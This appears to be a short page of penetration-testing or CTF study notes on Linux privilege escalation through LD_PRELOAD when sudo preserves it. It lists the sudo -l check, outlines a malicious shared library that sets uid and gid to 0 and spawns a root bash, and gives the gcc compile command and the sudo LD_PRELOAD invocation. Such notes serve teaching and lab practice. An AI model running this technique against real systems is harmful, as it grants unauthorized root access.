LD_PRELOAD

Pre-loading is a feature of LD (Dynamic Linker) which is available on most UNIX systems. This can be exploited by loading a custom library of our choice (as root) before loading a different library

sudo -l

Create a the malicious library in C

Code Breakdown:

Including standardio, sys/types and standard libraries
Unset the LD_PRELOAD environment variable
Set the gid and uid to 0 (which is root)
Then we want to execute /bin/bash as root (0)

Compile

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Use LD_PRELOAD and another command that we can run as root

sudo LD_PRELOAD=/tmp/shell.so iftop

PreviousIntended Functionality NextSimple CTF